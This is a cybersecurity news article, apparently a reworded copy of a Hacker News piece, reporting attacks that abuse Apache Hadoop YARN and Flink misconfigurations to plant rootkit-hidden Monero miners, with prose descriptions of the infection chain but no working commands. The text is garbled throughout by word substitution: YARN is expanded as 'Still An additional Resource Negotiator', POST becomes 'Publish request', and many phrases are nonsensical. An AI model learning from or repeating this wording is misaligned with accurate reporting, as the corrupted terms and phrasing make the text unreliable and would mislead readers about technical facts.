Cybersecurity scientists have discovered a new attack that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners in focused environments.
“This attack is specifically intriguing because of to the attacker’s use of packers and rootkits to conceal the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag explained in an evaluation revealed earlier this 7 days. “The malware deletes contents of unique directories and modifies system configurations to evade detection.”
The an infection chain concentrating on Hadoop leverages a misconfiguration in the YARN’s (Still An additional Resource Negotiator) ResourceManager, which is responsible for monitoring methods in a cluster and scheduling apps.
Exclusively, the misconfiguration can be exploited by an unauthenticated, distant threat actor to execute arbitrary code by implies of a crafted HTTP request, subject to the privileges of the user on the node where the code is executed.
The assaults aimed at Apache Flink, similarly, just take aim at a misconfiguration that permits a distant attacker to reach code execution sans any authentication.
These misconfigurations are not novel and have been exploited in the earlier by monetarily enthusiastic teams like TeamTNT, which is acknowledged for its heritage of targeting Docker and Kubernetes environments for the function of cryptojacking and other malicious things to do.
But what makes the most up-to-date set of attacks noteworthy is the use of rootkits to cover crypto mining processes soon after getting an preliminary foothold into Hadoop and Flink purposes.
“The attacker sends an unauthenticated ask for to deploy a new software,” the scientists explained. “The attacker is able to run a distant code by sending a Publish request to the YARN, requesting to start the new application with the attacker’s command.”
The command is function-developed to apparent the /tmp listing of all present information, fetch a file referred to as “dca” from a distant server, and execute it, adopted by deleting all documents in the /tmp directory at the time all over again.
The executed payload is a packed ELF binary that functions as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It is value pointing out that many adversaries, which include Kinsing, have resorted to utilizing rootkits to conceal the existence of the mining course of action.
To realize persistence, a cron work is established to obtain and execute a shell script that deploys the ‘dca’ binary. Further investigation of the menace actor’s infrastructure reveals that the staging server utilized to fetch the downloader was registered on Oct 31, 2023.
As mitigations, it really is suggested that companies deploy agent-centered security remedies to detect cryptominers, rootkits, obfuscated or packed binaries, as effectively as other suspicious runtime behaviors.
Uncovered this post interesting? Follow us on Twitter and LinkedIn to go through more unique content material we post.
Some parts of this article are sourced from:
thehackernews.com